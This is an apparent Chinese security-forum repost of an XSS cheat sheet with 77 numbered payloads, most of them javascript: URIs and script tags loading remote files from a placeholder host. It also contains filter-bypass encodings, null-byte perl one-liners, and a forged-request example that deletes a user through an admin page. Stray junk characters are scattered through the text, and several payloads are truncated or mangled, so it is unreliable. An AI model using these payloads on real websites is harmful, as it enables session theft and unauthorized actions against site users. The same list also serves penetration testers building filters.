貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
% b9 e( h1 S' Q) A; b(1)普通的XSS JavaScript注入3 l3 k" u% A2 n% V _
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. { w( y& }, G! R5 R3 R- D(2)IMG标签XSS使用JavaScript命令
& G, K+ V5 W% M<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>6 C0 l# N7 w3 c3 ~/ [
(3)IMG标签无分号无引号
+ [# e* R. i' s" x<IMG SRC=javascript:alert(‘XSS’)>) l: z8 T/ \' L8 n& F, d
(4)IMG标签大小写不敏感
% R% I% q/ p0 T8 h S. y<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
5 |3 v" V1 {& \0 M9 w" v(5)HTML编码(必须有分号)
/ r, W9 [! w$ B. I4 v<IMG SRC=javascript:alert(“XSS”)> y5 e5 J+ I0 C- G* h6 U+ y g" i
(6)修正缺陷IMG标签, O7 |' I( {% p
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> u7 O; Y; q$ v: H! E; M
& ]) N6 s v2 ~: }1 v: Q
, T# ?- k/ o* i( f(7)formCharCode标签(计算器)& d8 R" [( v7 z5 h: q, ~
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
6 J0 S. o3 _8 z: G' ](8)UTF-8的Unicode编码(计算器). x& j! [6 Q E+ t7 M
<IMG SRC=jav..省略..S')># i; ` ]. Z( i) k# o
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
; J8 d: E2 ~! k' v<IMG SRC=jav..省略..S')>
* t d8 J) O4 t(10)十六进制编码也是没有分号(计算器)
) }0 f% j$ j4 ^* b- v<IMG SRC=java..省略..XSS')>
) B; E! Y. N# x3 M& D! f(11)嵌入式标签,将Javascript分开% O: p4 f* Q5 D& j8 N# m" J
<IMG SRC=”jav ascript:alert(‘XSS’);”>9 g5 b. d/ y3 }# B. {
(12)嵌入式编码标签,将Javascript分开
$ q) P( K M$ H) q<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 V/ u+ U9 D. V0 d+ \! Y(13)嵌入式换行符
~, Y3 D7 p! G: `4 `<IMG SRC=”jav ascript:alert(‘XSS’);”>. f! B7 s7 k6 \; |6 }9 j
(14)嵌入式回车1 e: X. u: ?4 ]7 b
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; `5 _$ T- g2 J$ \' i+ H(15)嵌入式多行注入JavaScript,这是XSS极端的例子0 M8 f( C* a; R
<IMG SRC=”javascript:alert(‘XSS‘)”>- n. K7 V& t! G5 g! t: L
(16)解决限制字符(要求同页面)
7 U1 R! p* l1 K8 O<script>z=’document.’</script>) |; p" E8 E* c/ Z& a7 X9 {
<script>z=z+’write(“‘</script>
/ w/ H6 w9 {/ l& p$ ~0 @; \<script>z=z+’<script’</script>$ c# L! X9 Z5 b5 P7 `: I& D( [
<script>z=z+’ src=ht’</script>% p ?& ^- `* h# t7 ~5 j
<script>z=z+’tp://ww’</script>! b1 S. \1 u j0 ^
<script>z=z+’w.shell’</script>; F! \. F: J7 @! t% S: g
<script>z=z+’.net/1.’</script>/ P! @ x+ E: n- y9 f: i6 u
<script>z=z+’js></sc’</script>, A) T% h! N3 ^8 `5 S' _3 P0 P
<script>z=z+’ript>”)’</script>
4 O; v) H7 B* Y- V+ t9 T2 l<script>eval_r(z)</script>) N) v6 P: ^/ v0 P4 Y
(17)空字符12-7-1 T00LS - Powered by Discuz! Board6 t: ~: S; l* K6 A; h1 e4 w
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
* z, D( A9 y3 l0 D1 Y. D! zperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out8 a! w) v: O. x2 l$ k# G7 P& k! q- ?# o
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
/ |9 i0 ]; h# C) X3 Lperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out/ z: B3 d% J2 `$ f1 q5 O
(19)Spaces和meta前的IMG标签
8 u4 b3 V3 x8 o( V- v<IMG SRC=” javascript:alert(‘XSS’);”>' b# p& V( N. [7 ?
(20)Non-alpha-non-digit XSS
. V% u; o3 H* f6 b) n! R; g<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>; @, n9 A& F& x/ U7 A# z
(21)Non-alpha-non-digit XSS to 2
. H$ _4 [' i! i+ G. [* L<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>( |( n3 K; N. |6 d
(22)Non-alpha-non-digit XSS to 3
3 w( R- t) z( _3 w J/ U& W<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
+ y ^6 z8 F$ Q/ j' [(23)双开括号% ?9 G' P! Q4 _; N4 O& S
<<SCRIPT>alert(“XSS”);//<</SCRIPT>- u- ^8 C5 j9 l3 Q' e1 g
(24)无结束脚本标记(仅火狐等浏览器)( X# }7 R6 _0 K4 c* z
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
* H- ^0 M) p6 u: f+ Z# k(25)无结束脚本标记2
) ]: k3 E: b ~% d- [<SCRIPT SRC=//3w.org/XSS/xss.js>
, l) I+ |7 }' Y+ L7 l0 C" ?(26)半开的HTML/JavaScript XSS
9 l7 N7 R; R, i0 U6 X: O! x<IMG SRC=”javascript:alert(‘XSS’)”
" P* p: L$ C7 l% L W. Y5 l% j4 q(27)双开角括号5 ~9 T! |; J* d/ y( _
<iframe src=http://3w.org/XSS.html <! `+ u# ]# s$ i4 j
(28)无单引号 双引号 分号
- K8 \( D n* j+ m& ` _6 |<SCRIPT>a=/XSS/
% ] Z2 g' V! G; b7 ? \" calert(a.source)</SCRIPT>1 D9 Q) m5 b: k8 B. ]* v- v
(29)换码过滤的JavaScript
# L& ?/ v( K1 z/ U( D\”;alert(‘XSS’);//
4 j5 Q' ]. ~* T3 W6 _(30)结束Title标签
2 I; n: N8 h7 x1 V$ w</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
- R7 P2 W, I( ^0 C% [(31)Input Image1 N5 t' v: O5 X% p$ V
<INPUT SRC=”javascript:alert(‘XSS’);”> \/ M$ s( m7 r t
(32)BODY Image
) }8 \! R# N. A! T- ~ [/ H; ^<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
+ @8 ^# g+ Y4 S(33)BODY标签
* n2 o" t5 C6 K1 s2 k& W<BODY(‘XSS’)>
( z$ w+ _5 R3 G; s n! O$ l9 u- Y4 C, o- o(34)IMG Dynsrc% q& }3 v0 n. h m: F R2 S5 W, h0 N
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
" S' o1 Z8 I6 E: g) b) i" H- f(35)IMG Lowsrc4 h' t: V' ~7 j2 l7 Q
<IMG LOWSRC=”javascript:alert(‘XSS’)”>8 c0 Y- s: r0 w8 X" m% I, J- M2 m
(36)BGSOUND+ q8 S; ^8 t- ~. [ k6 g# H
<BGSOUND SRC=”javascript:alert(‘XSS’);”>2 I: ]) P; e* m' \
(37)STYLE sheet
0 Y6 O- U4 [# y! }/ S B<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
8 ~. C: s4 x0 I# b(38)远程样式表' K8 w# y8 z3 _* K- I6 L* S
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>) D/ h! _. a/ `' z
(39)List-style-image(列表式)
8 y) L; `4 p$ M* O" W7 g<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
1 S- N, @ Q$ V% ~(40)IMG VBscript
" H/ G4 A% |/ r<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS. N% {) V O7 _1 w+ L; L: C
(41)META链接url/ H0 B1 |$ c$ G
4 w9 [$ p% G+ C. t
) ?% P7 M& ]' D2 l2 A' g2 |; Z
<META HTTP-EQUIV=”refresh” CONTENT=”0;- `: B( J9 c7 w9 H: m7 r. o0 k/ b
URL=http://;URL=javascript:alert(‘XSS’);”>
* D, y- `) g) G0 u% B! W! O9 t. X(42)Iframe- H3 g4 X) l6 k+ w
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
" X) k2 ?# P' y( x6 j" k; T* V(43)Frame
2 ~- G0 U8 k& y o5 |2 e' Y& H<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
" o6 ^; \' y% b% _ x+ dhttps://www.t00ls.net/viewthread ... table&tid=15267 3/69 s* M* d! {6 b. R' y. k/ |
(44)Table$ r9 n) C; H( E9 l& O- i
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
5 {' }- c$ Z. d9 ]; N- w(45)TD0 a$ n! j& s" C) V! k$ d
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
4 h& b/ @) F, l. U) x8 Z4 \- A# w(46)DIV background-image
& |$ o# i) Y8 n<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
+ [7 z( z" u/ V& A8 _# c(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8 }; [) B$ R. a/ [3 m6 ^4 ]
8&13&12288&65279)
6 p4 Z, ?3 x8 U' Y, ]! C<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>* h! {# o: ]$ A" L8 K
(48)DIV expression! w0 G1 Q9 J& L, B) G' e8 P5 `. |
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
+ X8 W! G4 A j7 ?) I2 l F; L(49)STYLE属性分拆表达
6 E- a# x9 j( d/ y. r<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
' V- O6 ~$ b2 L(50)匿名STYLE(组成:开角号和一个字母开头)
4 q1 o9 R* B8 z/ |) M<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" }$ Y4 w Z% v+ X0 h7 s(51)STYLE background-image3 ?) \4 e# J. l/ Q
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
* p! S& l6 B! p* H- W, I& Y$ ECLASS=XSS></A>2 d! n) Y i5 |/ V- I
(52)IMG STYLE方式
O6 v0 u) r: X* Q9 J! e1 \exppression(alert(“XSS”))’>
2 o9 e( `+ ]# H: P(53)STYLE background: V0 q+ i3 p" f1 R i& {
<STYLE><STYLE
w4 [" D! X5 P% l. v( Ttype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>; n/ _- i+ A+ a& V( E" j
(54)BASE
% Y4 ]% L/ R1 q/ N<BASE HREF=”javascript:alert(‘XSS’);//”>
7 p! j C" L3 p! [3 C* g5 H(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS0 W7 I p0 }6 ^4 p& [9 S# @3 ?
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
2 ]3 Z: n' f0 F: K. L! M(56)在flash中使用ActionScrpt可以混进你XSS的代码
; H8 s) c: r! S1 r0 r' V4 |/ xa=”get”;0 a* ]" ]3 L R% ?8 Y
b=”URL(\”";
) v; z- t; i! |c=”javascript:”;% m9 e6 ]+ k+ ]8 Q a5 e* B
d=”alert(‘XSS’);\”)”;
; k; E4 r+ a% q# m/ ieval_r(a+b+c+d);
Z- e0 s: V+ H* H# h! ^) V(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上/ C9 @. |; S3 {4 e$ t' u
<HTML xmlns:xss>3 Q- Q7 s# P% F# k/ r" W
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
6 ^* r: O( p6 V7 O: S2 {8 J# [<xss:xss>XSS</xss:xss>
3 g6 z. Y7 A9 x6 s; x</HTML>
) S9 u- ], B* ^. g# w) b(58)如果过滤了你的JS你可以在图片里添加JS代码来利用1 j D9 R, v$ v' Z4 K8 X
<SCRIPT SRC=””></SCRIPT>
2 X9 b4 @% Q' z4 {: p7 \& ^(59)IMG嵌入式命令,可执行任意命令
: k6 W& M7 [# ~5 ?, k( [<IMG SRC=”http://www.XXX.com/a.php?a=b”>
& i8 t9 N* C4 |; b0 v(60)IMG嵌入式命令(a.jpg在同服务器)
& g; W2 x ^! n# w. VRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser3 {+ U" Z0 s& A2 P5 Y) s; f5 ^$ R
(61)绕符号过滤+ Q' s" D$ u4 S) O% ^' r& L
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>4 p! h# d# R. Z% k+ y. J5 t
(62)
g: y! W% t% r! E9 ]6 V<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
# l+ s( L2 l1 C2 H4 R9 y(63)
* v7 ^% m8 t; B# j<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
4 O: B3 F* K) t* I, l- X) Q! E(64)% R! O) p* w) C, D# d1 I* Z" v
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>6 I4 @' l5 G, k9 y9 Z4 |/ V1 o" E
(65)& K3 I. _# I! P- e& o
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>7 Z" q0 b, f! ^
(66)12-7-1 T00LS - Powered by Discuz! Board
2 l( a( R" B/ uhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6* L, W6 o5 S$ g& I: W$ o
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ p, t8 a7 ?& z- o(67)
: k) z" }+ o% f4 T3 k2 l! i* x+ k<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
( U B$ ]3 B& {; ~7 U</SCRIPT>! x' P4 f3 j$ u
(68)URL绕行
/ U- P- i% {0 [- I, |3 y% J0 a<A HREF=”http://127.0.0.1/”>XSS</A>' z2 ^3 D E* U3 Y
(69)URL编码
3 H, D8 }$ K9 Y<A HREF=”http://3w.org”>XSS</A>2 r! @$ e1 |+ }' c. m
(70)IP十进制$ }4 v B( G- m4 y% q1 S, `% V
<A HREF=”http://3232235521″>XSS</A>( q7 c) f6 k+ S( `0 m% N9 S& m
(71)IP十六进制2 }, @. o- z- L5 L
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
; \* s& I9 a% Z' @* W$ g9 g(72)IP八进制
6 D; k# n2 T% e6 ?+ C$ H6 r<A HREF=”http://0300.0250.0000.0001″>XSS</A> e( M& T9 i* J, x7 J0 a0 e
(73)混合编码
% N( ]/ S+ W+ V" k$ ]<A HREF=”h
6 Y- O8 k3 W* O+ m7 r( @tt p://6 6.000146.0×7.147/”">XSS</A>( n* P0 R+ p, @4 s) _' ^6 b
(74)节省[http:] @8 B) A. W9 b: O( ~! m, D
<A HREF=”//www.google.com/”>XSS</A>) f# j9 e" J n; Z' _% A
(75)节省[www]
" c" d- P: Z$ ^- N5 y<A HREF=”http://google.com/”>XSS</A>, _/ u5 o) ?7 K0 n! q
(76)绝对点绝对DNS, I& ?6 D" M, n+ e& {
<A HREF=”http://www.google.com./”>XSS</A>
! i- K" W0 V z/ ~& ~8 G(77)javascript链接; w: \) A; |+ N+ [
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
( j5 y! ]5 [# D2 X3 n3 \+ B
9 |+ v6 b3 g4 c/ m' `% g: g7 q原文地址:http://fuzzexp.org/u/0day/?p=14, X8 k! _; B! s+ r* @. E( m, p+ A
/ h3 T3 w& y/ s1 ^; p3 y' R; _
|
发表于 2013-4-19 19:22:37
收藏
支持
反对